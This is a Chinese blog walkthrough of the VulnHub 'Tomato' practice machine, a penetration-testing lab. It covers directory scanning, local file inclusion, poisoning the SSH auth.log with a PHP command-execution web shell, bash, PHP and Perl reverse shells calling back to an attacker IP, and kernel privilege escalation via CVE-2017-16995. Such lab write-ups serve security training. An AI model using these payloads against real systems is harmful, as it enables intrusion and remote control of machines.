vulnhub之tomato(西红柿)

最新推荐文章于 2024-07-06 07:51:21 发布
最新推荐文章于 2024-07-06 07:51:21 发布
阅读量728 收藏 2
点赞数
分类专栏: Vulnhub 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125538373
版权

目录

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

五、扩大供给面扫描目录

1.dirsearch常规字典

2.gobuster

六、/antibot_image信息收集

七、文件包含

八、反弹shell

九、内核漏洞枚举提权

 1.工具linux-exploit-suggester

2.传输工具

3.挨个尝试

十、CVE-2017-16995

一、主机发现

二、端口扫描

三、服务版本发现

开放了两个http服务端口,使用的中间件不一样。

21端口部署ftp

2211端口部署ssh服务

还知道这是unbuntu系统。

四、信息收集

1.80

果然是个大西红柿,再例行检查下源码,业务有用信息

2.8888

 登录框,最经典尝试,弱口令。无法成功

五、扩大供给面扫描目录

1.dirsearch常规字典

啥都没有,换大字典的话dirsearch跑的很慢,所以换gobuster

2.gobuster

是基于go语言开发的,速度快

gobuster dir -u  http://192.168.0.101 -w /usr/share/seclists/Discovery/Web-Content/common.txt

301状态码引起我们的注意

六、/antibot_image信息收集

1.从图片判断这服务器部署里反爬虫应用

2.info.php文件

这就是一个phpinfo文件,里面有开关配置信息,服务器环境,配置文件目录等

3.info.php文件源码

注释中出现了信息泄露,很明显是一个include文件包含的函数

七、文件包含

 1.参数中对本地文件进行包含

2.对远程文件包含

实操:在kali上创建一个php文件,来远程包含,失败

条件:简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。
要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启)

这点从phpinfo中也可以看出来。他没开

3.通过文件包含漏洞查看私钥

失败,他没有/home/tomato/.ssh/id_rsa

4.查看ubuntu日志文件

/var/log/auth.log

这个日志是unbuntu默认的登陆失败的记录日志。所以我们可以利用ssh或者ftp登录失败注入代码。

5.测试

ssh aaaaaaaaaaaa@192.168.0.101 -p 2211

果然我们输入的aaaaaaaaaaaa都出现在了上面,把他更改为木马

 

6.写入命令执行木马到日志

<?php echo system($_GET['cc'])?>

将这个写入的时候,php代码没有显示,证明服务器存在php运行环境,注入脚本正常解析了

7.参数测试

view-source:http://192.168.0.101/antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id

八、反弹shell

最后利用python反弹成功

 1.bash

bash -i >& /dev/tcp/192.168.0.104/4444 0>&1

2.php

php -r '$sock=fsockopen("控制端ip",控制端端口);exec("/bin/bash -i <&3 >&3 2>&3");'

3.perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

九、内核漏洞枚举提权

 1.工具linux-exploit-suggester

sudo apt install linux-exploit-suggester

2.传输工具

服务端:

nc -nvlp 4444 > 1.sh

客户端:

nc 192.168.0.101 4444 < linux-exploit-suggester.sh -w 1

3.挨个尝试

十、CVE-2017-16995

在kali端用gcc编译后,nc上传,给予权限,最后执行。

 

 

梅_花_七
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnhubTomato
千寻的博客
01-12 642
环境搭建 下载地址: https://www.vulnhub.com/entry/tomato-1,557/ kali 192.168.232.140 tomato: 192.168.232.175 win10 :192.168.232.171 第一部分 信息收集 第一步 扫描,发现主机 nmap -sP 192.168.232.0/24 arp-scan -l 第二步 扫描开放的端口 nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1459
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。
VulnHub Tomato
weixin_45682839的博客
10-27 2147
涉及知识:主机存活扫描、端口服务探测、WEB信息搜集、目录搜索、文件包含漏洞,日志写入webshell、linux本地提权
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1163
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
vulnhub靶场,Tomato
kukudeshuo的博客
07-25 646
vulnhub靶场,Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机:Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
VulnhubTomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Vulnhub---Tomato
从不专注的人的博客
06-01 416
Tomato(文件包含getshell) 这个靶机是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell 靶机下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 信息收集 扫描目标网段确定ip地址 nmap -sP 172.16.58.0/24 扫描该ip开放端口 nmap -A -p- 172.16.58.128 扫描出来的端口,针对打开的端口进行访问 发现漏洞
vulnhub靶场-tomato
qq_42947816的博客
03-07 7508
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
tomato打印服务共享教程
06-01
例如,如果主路由器的IP地址为192.168.1.1,则需要将之修改为192.168.1.254。然后,取消DHCP,点击确定,最后将主路由器的网线连接到服务器的Lan口。需要注意的是,如果修改错误,可能会导致无法访问配置页面,可以...
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
Tomato番茄固件双WAN设置教程
01-26
Tomato番茄固件双WAN设置教程
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1848
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 952
Vulnhub-Tomato靶机实战
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1436
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
Vulnhub Tomato靶机渗透记录
m0_43424471的博客
10-08 1441
Vulnhub Tomato靶机渗透记录 环境配置 Kali Linux IP:192.168.1.128 Tomato IP: 192.168.1.140 信息收集 使用arp-scan -l 扫描本地局域网存活主机: nmap扫描开放端口以及相关信息: 访问http服务端口查看页面信息: 没有相关可利用信息,继续访问8888端口http服务: 利用dirb对站点目录进行爆破: 发现其他站点目录,尝试访问: 根据修改时间发现info.php文件最新更新,访问并查看源码: 发现文件包含,尝试包含
vlunhub之tomato
鲨鱼辣椒的博客
05-31 356
目录 信息搜集 扫描网段确定主机IP地址 ​扫描该IP地址开放端口以及服务 ​发现漏洞 利用IP地址登录 ​尝试扫描出的端口 爆破网站目录 发现敏感文件泄露 利用漏洞 尝试getsell 利用php反弹shell 权限提升 在该目录下开启http服务 在getshell里下载该文件 信息搜集 扫描网段确定主机IP地址 扫描该IP地址开放端口以及服务 nmap -A -p- 192.168.179.128 发现漏洞 利用IP地址登录 尝试扫描出的端口 只有88
日志文件写入失败(permission denied)
热门推荐
Diors
08-18 1万+
用过Laravel的小伙伴一开始安装完框架后可能都遇到过daily 日志文件写入失败的问题,接下来我们就来详细说下日志文件写入失败的原因以及对应的解决方案。 在讲这个问题之前可能需要简单介绍下Linux系统下的文件的Ownership和Permission。 Ownership User User是文件的所有者,默认情况下,用户创建了一个文件,该文件的所有者就是该用户。 ...
VPS拨号服务器:独享的高效与安全
最新发布
qq_34245974的博客
07-06 650
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
apples or tomato 苹果/西红柿图像分类数据挖掘
07-17
### 回答1: 苹果和西红柿是两种常见的水果,虽然它们在形状、颜色和口感上有所不同,但在图像分类数据挖掘中,我们可以通过训练模型来区分它们。 首先,我们需要准备一个包含大量苹果和西红柿图像的数据集。这个数据集可以包括各种角度、距离和光照条件下的苹果和西红柿图像。每个图像都需要标注上苹果或西红柿的信息,以便我们可以在训练模型时进行监督学习。 接下来,我们可以使用深度学习模型来训练我们的图像分类器。深度学习模型可以通过多层神经网络来学习复杂的图像特征。我们可以使用已经训练好的模型(如ResNet、VGG等)作为基础网络,并对其进行微调以适应我们的数据集。同时,我们还需要使用一些数据增强技术(如旋转、缩放、翻转等)来扩充我们的训练数据集,以提高模型的泛化能力。 在训练过程中,我们将图像输入到模型中,并与标签进行比较以计算损失。然后,我们使用反向传播算法调整模型的参数,以最小化损失函数。重复这个过程直到模型达到我们的要求。 完成模型训练后,我们可以使用它来进行图像分类。给定一个未知水果的图像,我们可以使用模型来预测它是苹果还是西红柿。模型会输出一个概率分布,表示该水果是苹果或西红柿的可能性。根据概率值,我们可以根据阈值来判断该水果的分类。 总之,通过图像分类数据挖掘技术,我们可以训练一个模型来区分苹果和西红柿。这个模型可以应用于水果质检、农产品销售等领域,提高工作效率和准确性。 ### 回答2: 苹果和西红柿图像分类数据挖掘是利用机器学习和图像识别的技术,对苹果和西红柿的图像进行分类和识别。这种数据挖掘技术可以帮助我们快速准确地将苹果和西红柿进行区分。 首先,需要准备一个包含大量苹果和西红柿图像的数据集。数据集应包含不同品种、形状和颜色的苹果和西红柿图像。同时,为每个图像加上标签,以便机器学习算法可以学习和识别不同的特征。 接下来,采用图像处理技术,对每张图像进行预处理。这包括调整图像大小、去除噪声和标准化图像亮度和对比度。这样可以确保每张图像具有一致的特征表达,从而提高模型的准确性。 然后,选择一个适当的机器学习算法来训练和构建苹果和西红柿图像分类模型。常用的算法包括卷积神经网络(CNN)、支持向量机(SVM)和随机森林(Random Forest)。通过将图像和标签输入到算法中,它们将学习图像的不同特征和模式,从而能够将苹果和西红柿进行有效分类。 训练完成后,需要对模型进行评估和优化。可以将一部分数据用于验证模型的准确性,并根据评估结果对模型进行调整。一些常见的评估指标包括准确率、召回率和F1得分。 最后,当模型通过评估并达到一定准确率后,可以将其应用于新的未知图像。通过将新的苹果和西红柿图像输入到模型中,它将基于之前学到的知识进行分类,并输出相应的结果。 通过苹果和西红柿图像分类数据挖掘,我们可以快速准确地对苹果和西红柿进行识别。这可以在农业、食品加工和市场销售等领域提供帮助,从而提高效率和准确性。 ### 回答3: 苹果和西红柿是两种常见的水果,它们的外观和质感有所不同。通过图像分类数据挖掘技术,我们可以训练一个模型,使其能够识别苹果和西红柿的图像。 首先,我们需要收集大量的苹果和西红柿的图像数据作为训练集。这些图像可以来自于互联网、水果市场或者是我们自己拍摄的照片。要确保训练集具有代表性,包含各种不同品种、不同成熟度和不同质量的苹果和西红柿图像。 接下来,我们可以使用机器学习算法,如卷积神经网络(CNN),来对这些图像进行训练和分类。CNN是一种在图像识别中广泛使用的深度学习算法,它可以自动提取图像中的特征并进行分类。我们可以使用已经训练好的CNN模型,如ResNet或VGG,也可以根据自己的需求构建和训练新的模型。 在训练过程中,我们将图像和相应的标签(苹果或西红柿)输入到CNN模型中,通过反向传播算法来优化模型的参数,使其能够准确地识别出苹果和西红柿。 一旦模型训练完成,我们可以使用这个模型来对新的图像进行分类。通过将新的图像输入到已经训练好的模型中,模型将会输出它认为图像是苹果还是西红柿的概率。 总而言之,使用图像分类数据挖掘技术可以帮助我们实现苹果和西红柿的自动识别。这项技术可以应用于水果品质检测、智能农业和食品生产等领域,提高生产效率和品质控制水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值